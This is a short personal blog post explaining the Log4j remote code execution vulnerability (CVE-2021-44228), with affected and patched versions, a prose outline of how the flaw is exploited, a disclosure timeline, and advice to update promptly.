Remote Code Execution in Java Apache Log4j 2 (CVE-2021-44228)

Hello World!

The Internet was rattled the last couple of days over a new critical bug found within a very ubiquitous library, current known vulnerable versions include but may not be limited to Apache Log4j versions 2.10 to 2.14.1. Patches are now mostly available and should be installed as soon as possible, 44228 is currently being exploited in the wild and there’s even been a case of log4j payloads being used with crypto miner.

Edit 4th January 2022: Updated mitigation information, current secure versions are are follows: Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6)

JNDI – Java Naming and Directory Interface.

LDAP – Lightweight Directory Access Protocol.

A basic flow chart to illustrate the attack methods. Credit: Fastly

Here’s a brief explanation of the exploit from an attackers perspective… An attacker controlled value is parsed to the logging library, the attacker then exploits the string interpolation feature inside log4j to trigger object deserialization which results in the conditions for remote code execution on the server. To put this simply for others, this allows the attacker to execute their own code on the server, essentially letting them do anything… (But this will depend on the attackers skill level.)

Since the 9th December the Cyber Security world has been scrambling to mitigate this vulnerability, there are configuration options that will allow you to disable functionalities that result in this vulnerability but that’s likely a temporary fix. Updating the vulnerable library if you have the ability to, but many people will have to wait for individual patches from the vendors of their products.

On November 24, 2021, Apache was notified about the Log4j remote code execution vulnerability by the Alibaba Cloud Security team. The exploit proof of concept was then posted to Github at 15:32 GMT on December 9, 2021, and we saw the first attempts to trigger callbacks 82 minutes later.

I also received my YubiKeys around the same time, which I haven’t completed setting up yet but plan to have a post about them up soon, it won’t be highly technical as I more want to sell the technology and get the point across why you should be using MFA and/or security keys.

Sources: & Bishop Fox/YouTube